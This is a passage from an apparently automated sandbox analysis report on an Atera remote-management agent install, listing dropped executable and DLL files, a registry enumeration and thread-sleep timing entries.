                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XPath.XDocument.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\mscorrc.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\choco.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.Debug.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Drawing.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.FileSystem.Watcher.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Timer.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeDropped PE file which has not been started: C:\Windows\Temp\SplashtopStreamer.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\mscordaccore_amd64_amd64_6.0.3224.31407.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.Tasks.Parallel.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.HttpListener.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ComponentModel.DataAnnotations.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Text.Encoding.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIAC5.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\RestartReminderNotification.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\StructureMap.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSIA259.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\mscorlib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Collections.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\chocolatey.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\chocolatey.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Numerics.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\EO.WebBrowser.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Buffers.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Tasks.Parallel.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ValueTuple.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ComponentModel.Primitives.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.FileSystem.DriveInfo.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.XDocument.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.Emit.Lightweight.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\clretwrc.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\clrjit.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.Configuration.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Private.DataContractSerialization.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.WebSockets.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI9B15.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\mscordbi.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\cpush.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\NLog.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSIB4E8.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIBEDF.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.Compression.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI72FF.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Principal.Windows.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Resources.Writer.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\ThirdPartyPackageManager.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\BouncyCastle.Crypto.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Sockets.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.FileProviders.Physical.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Agent.Package.Watchdog.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Resources.Reader.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Globalization.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.Compression.Native.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Buffers.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Resources.ResourceManager.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.TraceSource.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Http.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\System.Memory.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ComponentModel.EventBasedAsync.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\zh-CN\Microsoft.Win32.TaskScheduler.resources.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Encoding.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Newtonsoft.Json.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackage.Common.dll
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.UnmanagedMemoryStream.dll
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Text.Encoding.CodePages.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Polly.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Numerics.Vectors.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.ValueTuple.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\Microsoft.ApplicationInsights.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.DependencyInjection.Abstractions.dll
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.Tools.dll
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-memory-l1-1-0.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.FileSystem.dll
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-conio-l1-1-0.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Data.SQLite.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\SharpSnmpLib.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Atera.AgentPackage.Common.dll
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.TypeExtensions.dll
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Primitives.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeRegistry key enumerated: More than 126 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                                Source: C:\Windows\SysWOW64\rundll32.exe TID: 7848Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 6456Thread sleep time: -60000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 8172Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 3800Thread sleep count: 5693 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 3800Thread sleep count: 3805 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep count: 31 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep time: -28592453314249787s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 6536Thread sleep count: 50 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 6536Thread sleep time: -500000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7540Thread sleep time: -7378697629483816s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 6976Thread sleep time: -180000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep time: -43125s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep time: -43016s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep time: -42907s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep time: -42781s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep time: -42640s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep time: -42515s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep time: -42360s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep time: -42003s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep time: -41584s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep time: -41426s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep time: -41202s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep time: -41094s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep time: -40984s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep time: -40870s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep time: -40762s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep time: -40625s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep time: -40509s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep time: -40383s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep time: -40281s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep time: -40172s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep time: -40063s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep time: -39953s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep time: -39844s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep time: -39735s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep time: -39625s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep time: -39508s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep time: -39375s >= -30000s
                                Source: C:\Windows\SysWOW64\rundll32.exe TID: 7496Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 8008Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 8012Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 5980Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4016Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 1516Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 3256Thread sleep count: 7649 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 3256Thread sleep count: 1911 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 4236Thread sleep count: 41 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 4236Thread sleep time: -37815825351104557s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 4580Thread sleep time: -180000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 1832Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 4484Thread sleep time: -180000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 6676Thread sleep count: 5379 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 6676Thread sleep count: 1873 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -21213755684765971s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -600000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -599890s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -599780s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -599672s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -599561s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -599453s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -599340s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -599227s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -599080s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -598834s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -598605s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -598474s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -598352s >= -30000s
